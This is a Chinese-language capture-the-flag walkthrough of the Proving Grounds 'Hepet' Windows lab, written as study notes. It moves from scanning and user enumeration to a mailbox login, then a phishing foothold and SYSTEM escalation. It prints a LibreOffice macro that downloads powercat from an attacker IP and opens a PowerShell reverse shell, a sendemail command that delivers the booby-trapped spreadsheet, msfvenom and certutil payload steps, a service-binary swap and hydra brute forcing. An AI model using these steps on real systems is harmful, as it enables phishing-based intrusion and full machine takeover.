Difficulty

Meduim

Scan

autorecon 192.168.184.140

[*] smtp found on tcp/25.
    smtp Mercury/32 smtpd (Mail server account Maiser)
    enum found login: admin

[*] finger found on tcp/79.
    Mercury/32 fingerd
    Login: Admin 

[*] pop3pw found on tcp/106.
    Mercury/32 poppass service


[*] pop3 found on tcp/110.
    Mercury/32 pop3d

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] imap found on tcp/143.
     Mercury/32 imapd 4.62


[*] http found on tcp/443.
    Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23


[*] microsoft-ds found on tcp/445.
    smb

[*] http found on tcp/8000.
    Apache/2.4.46 (Win64)
  
[*] ph-addressbook found on tcp/105.

[*] http found on tcp/2224.
    Mercury HTTP Services

[*] unknown found on tcp/5040.

[*] vnc found on tcp/11100.
    version: 3.8

[*] ftp found on tcp/20001.
    FileZilla ftpd 0.9.41 beta
    Anonymous FTP login allowed

[*] unknown found on tcp/33006.
    MariaDB

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.



things to try
    - mail user: admin
    2224 reset passwd
    11110 vnc 3.8
    20001 ftp Anonymous FTP login allowed
       vue-blog-demo v1.0.0

    33006 MariaDB 

    8000 has /team /fonts maybe upload

20001 ftp

ftp可以匿名登录, 查看内容，看起来是网站的源码，使用lftp下载下来

ftp -a -A 192.168.184.140 -P 20001
Connected to 192.168.184.140.
220-FileZilla Server version 0.9.41 beta
220-written by Tim Kosse ([email protected])
220 Please visit http://sourceforge.net/projects/filezilla/
331 Password required for anonymous
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
-r--r--r-- 1 ftp ftp            312 Oct 20  2020 .babelrc
-r--r--r-- 1 ftp ftp            147 Oct 20  2020 .editorconfig
-r--r--r-- 1 ftp ftp             23 Oct 20  2020 .eslintignore
-r--r--r-- 1 ftp ftp            779 Oct 20  2020 .eslintrc.js
-r--r--r-- 1 ftp ftp            167 Oct 20  2020 .gitignore
-r--r--r-- 1 ftp ftp            228 Oct 20  2020 .postcssrc.js
-r--r--r-- 1 ftp ftp            346 Oct 20  2020 .tern-project
drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 build
drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 config
-r--r--r-- 1 ftp ftp           1376 Oct 20  2020 index.html
-r--r--r-- 1 ftp ftp         425010 Oct 20  2020 package-lock.json
-r--r--r-- 1 ftp ftp           2454 Oct 20  2020 package.json
-r--r--r-- 1 ftp ftp           1100 Oct 20  2020 README.md
drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 src
drwxr-xr-x 1 ftp ftp              0 Oct 20  2020 static
-r--r--r-- 1 ftp ftp            127 Oct 20  2020 _redirects
226 Transfer OK
ftp>

1	lftp -e "mirror -c -e / ftp" ftp://192.168.184.140:20001

查看是cms: vue-blog-demo v1.0.0, 没有其他信息，并且8000用的好像也不是这个，搜索FileZilla ftpd 0.9.41 beta 也没有可利用的已知漏洞

445 smbclient

不支持匿名登录，使用扫出来的admin爆破下密码，没有结果

hydra -l admin -P /usr/share/wordlists/rockyou.txt smb://192.168.184.140
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-23 15:53:36
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.184.140:445/
[ERROR] invalid reply from target smb://192.168.184.140:445/

2224 mlss

mailing list subscriber services, 有订阅和忘记密码功能，暂时没有可利用的点，也搜不到mlss的已知漏洞

79 finger

使用finger-user-enum.pl 枚举用户名

github: https://github.com/pentestmonkey/finger-user-enum

工具是在walkThrough: https://medium.com/@huwanyu94/proving-grounds-practice-hepet-walkthrough-ee7e051af47b 中看到的

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.184.140 |grep -v 'is not known'
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )


######## Scan started at Sun Feb 23 16:27:33 2025 #########
admin@192.168.184.140: Login: admin         Name: Mail System Administrator....[No profile information]..
agnes@192.168.184.140: Login: agnes         Name: Agnes....[No profile information]..
charlotte@192.168.184.140: Login: charlotte         Name: Charlotte....[No profile information]..
jonas@192.168.184.140: Login: jonas         Name: Jonas....[No profile information]..
magnus@192.168.184.140: Login: magnus         Name: Magnus....[No profile information]..
martha@192.168.184.140: Login: martha         Name: Martha....[No profile information]..

Mercury/32 mail

再枚举下用户名

1	hydra smtp-enum://192.168.180.140:25/expn -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" 2>&1

Mercury/32 有缓冲区溢出漏洞，但是不知道版本号，测试了一个无法利用成功

8000 / 443

基本是静态网页，没有可交互的地方

Jonas K.的介绍像是密码，我没发现这个密码，看了hits才留意到。walkThrough使用了 html2markdown

curl ``http://192.168.184.140:8000/|`` html2markdown > html.md

得到密码后第一想法是smbclient，测试发现登录失败，ftp也不行，再次看了hits，登录邮箱

telnet 192.168.184.140 110
Trying 192.168.184.140...
Connected to 192.168.184.140.
Escape character is '^]'.
+OK <14653593.7950@localhost>, POP3 server ready.
user Jonas
+OK Jonas is known here.
pass SicMundusCreatusEst
+OK Welcome! 4 messages (4744 bytes)
help
+OK
Mercury/32 MTS Post Office Protocol v3 server v4.62,
Copyright (c) 1993-2008 David Harris.
This server recognizes the following commands:
  USER - login as a user
  PASS - specify a password
  APOP - perform secure login
  CAPA - RFC2449 capability discovery
  STLS - Start TLS negotiation, if enabled
  STAT - show mailbox statistics
  RETR - send a message
  LIST - show message numbers and sizes
  DELE - delete a message
  RSET - 'undo' all mailbox changes
  TOP  - show lines from a message
  QUIT - close the connection
  NOOP, RPOP, LAST are also supported.

Extended commands:
  XTND XMIT  - Send a message via POP3
  XTND XLST  - Eudora extended list command
  UIDL - return unique identifier (RFC1725).
.
list 查看所有邮件
retr 2  查看具体内容

邮件内容是：新来的PR要求大家把spreadsheet发给mailadmin; mainadmin告诉大家公司改用LibreOffice了，spreadsheet就是office中的excel,

Foothold

新建一个恶意的ods文件, 操作方式如下：

https://books.libreoffice.org/en/GS70/GS7013-GettingStartedWithMacros.html

反弹shell macros:

1
2
3

Sub Main
Shell("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.234/powercat.ps1');powercat -c 192.168.45.169 -p 4444 -e powershell")
End Sub

设置为打开文件时，执行macros 反弹shell. 80端口启动http.server, 使用sendemail把附件发给mailadmin，等待片刻后收到反弹shell, 用户是Ela Arwel

1
2

sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.184.140:25 -u 'another spreadsheet' -m 'spreadsheet' -a /home/kali/pentestools/windows/clientside/test.ods
Feb 23 15:54:03 kali sendemail[3004302]: Email was sent successfully!

rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.140] 51171
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\LibreOffice\program> whoami
whoami
hepet\ela arwel

Eacalation

收集信息发现 service: VeyonService 由localSystem启动，并且在Ela arwrl目录下，有Full control权限，msfenvom生成反弹shell可执行文件，替换veyon-service.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o shell.exe

PS C:\users> Get-CimInstance -ClassName Win32_Service | 
    Select-Object Name, State, PathName, StartMode, StartName | 
    Where-Object { $_.State -like 'Running' -and $_.PathName -notlike '*svchost.exe*' }
Name      : COMSysApp
State     : Running
PathName  : C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
StartMode : Manual
StartName : LocalSystem

...

Name      : VeyonService
State     : Running
PathName  : C:\Users\Ela Arwel\Veyon\veyon-service.exe
StartMode : Auto
StartName : LocalSystem


PS C:\Users\Ela Arwel\Veyon> certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
                             certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
certutil -urlcache -f http://192.168.45.234/tmp/shell.exe s.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
                                                 


PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon.exe
                             mv veyon-service.exe veyon.exe
mv veyon-service.exe veyon.exe
PS C:\Users\Ela Arwel\Veyon> mv s.exe veyon-service.exe
                             mv s.exe veyon-service.exe
mv s.exe veyon-service.exe

没有重启服务权限，但是有重启机器权限，直接shutdown /r, 重启后获取system shell

PS C:\Users\Ela Arwel\Veyon> restart-service VeyonService
                             restart-service VeyonService
restart-service VeyonService
PS C:\Users\Ela Arwel\Veyon> restart-service : Service 'Veyon Service (VeyonService)' cannot be stopped due to the following error: Cannot open 
VeyonService service on computer '.'.
At line:1 char:1
+ restart-service VeyonService
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service 
   ], ServiceCommandException
    + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand
 


PS C:\Users\Ela Arwel\Veyon> net stop VeyonService
                             net stop VeyonService
net stop VeyonService
System error 5 has occurred.
PS C:\Users\Ela Arwel\Veyon> 
Access is denied.


PS C:\Users\Ela Arwel\Veyon> shutdown /r /t 0
                             shutdown /r /t 0
shutdown /r /t 0

rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

反思

收集信息还是忽略了很多内容，不只要关注软件漏洞、CMS漏洞，手动信息收集也很重要，点击测试查看所有内容知道找到突破点。

临渊羡鱼

Proving Grounds Practice - Hepet